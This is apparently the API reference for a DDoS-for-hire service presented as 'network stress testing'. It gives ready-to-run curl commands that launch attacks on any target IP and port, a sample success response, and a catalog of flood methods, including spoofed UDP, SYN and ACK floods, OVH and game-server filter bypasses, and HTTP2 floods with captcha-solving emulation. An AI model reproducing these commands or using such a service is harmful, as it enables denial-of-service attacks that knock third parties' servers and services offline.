Toxic Stress API Documentation

Comprehensive REST API reference for launching and automating network stress tests directly in CI/CD, scripts, and applications.

https://api.toxicstress.online
Authentication

All API requests require an active API key with IP whitelist authorization. You can generate your API key and configure whitelisted client IPs in your account profile. Authenticate requests using any of the following methods:

MethodFormat
Authorization Header Authorization: Bearer YOUR_API_KEY
Query Parameter ?api_key=YOUR_API_KEY
JSON Body {"api_key": "YOUR_API_KEY"}
Launch Stress Test
GET POST /api/fire
ParameterTypeStatusDescription
api_key string Required Your account API key
host string Required Target IP address or domain URL
port integer Required Target port (e.g. 80, 443, 25565)
time integer Required Attack duration in seconds (alias: duration)
method string Required Attack vector method identifier (see catalog below)
concurrent integer Optional Number of concurrent attacks to launch (default: 1)
Example — cURL GET Request
curl -X GET "https://api.toxicstress.online/api/fire?api_key=YOUR_API_KEY&host=1.2.3.4&port=80&time=60&method=u-gbps&concurrent=1"
Example — cURL POST Request (JSON)
curl -X POST "https://api.toxicstress.online/api/fire" \ -H "Authorization: Bearer YOUR_API_KEY" \ -H "Content-Type: application/json" \ -d '{ "host": "1.2.3.4", "port": 80, "time": 60, "method": "u-gbps", "concurrent": 1 }'
JSON Response — Attack Successfully Launched
{ "success": true, "message": "Attack launched successfully", "attack_id": 14092, "target": "1.2.3.4:80", "duration": 60, "method": "u-gbps", "concurrent": 1 }
Active Attacks Telemetry
GET /api/active-attacks

Retrieve currently active attacks launched by your account in real-time.

curl -X GET "https://api.toxicstress.online/api/active-attacks?api_key=YOUR_API_KEY"
Methods Reference Catalog
UDP
u-gbps
UDP-Gbps
Generic UDP Flooder, High GB/s
u-pps
UDP-PPS
Sending Rapidly Random Packets, High PPS
TCP
t-pass
TCP-Pass
TCP handshake with bypass
s-ovh
TCP-Ovh
OVH-specific GRE/IPIP flooding
SPECIAL
s-game
Game
Universal Game RAW Flood bypass for a lot of games.
s-five
FIVEM
FiveM application filter flood
s-subt
subnet
Subnet flood
s-ssh
SSH
SSH Flood Emulating SSH Clients, High CPS
s-ts3
TS3
TS3 flood
s-java
JAVA
MC Java application filter flood
s-samp
SA-MP
SAMP application filter flood
s-disc
DISCORD
Static data for discord voip servers with dynamic RTC
s-RDP
RDP
RDP application filter flood
s-fort
Fortnite
Fortnite flood
s-mixd
Mixed
Mixed UDP and TCP flood
HTTP
h-tls
HTTP-TLS
HTTP2 GET flood with dynamic-rate limit and valid profiles
h-emu
HTTP-BROWSER
HTTP2 GET flood with browser and captcha solving emulation
PRIVATE
p-hand
Handshake
Private TCP handshake flood (Requires Private Addon)
p-udp
Private UDP
High throughput private UDP flood (Requires Private Addon)
p-udpbig
UDPBig
High-bandwidth oversized UDP packet flood (Requires Private Addon)
p-tcpbypass
TCPBypass
Advanced TCP stateful bypass flood (Requires Private Addon)
p-tcpboom
TCPBoom
High-impact volumetric TCP burst flood (Requires Private Addon)
p-udpbypass
UDPBypass
Stateful UDP filtering bypass flood (Requires Private Addon)
p-ack
Private ACK
Private TCP ACK flood (Requires Private Addon)
p-spoofudp
Private SpoofUDP
Private Spoofed UDP flood (Requires Private Addon)
p-http
Private HTTP
Private HTTP flood (Requires Private Addon)
p-synhand
Private SYN+Handshake
Private TCP SYN+Handshake flood (Requires Private Addon)
p-syn
Private SYN
Private TCP SYN flood (Requires Private Addon)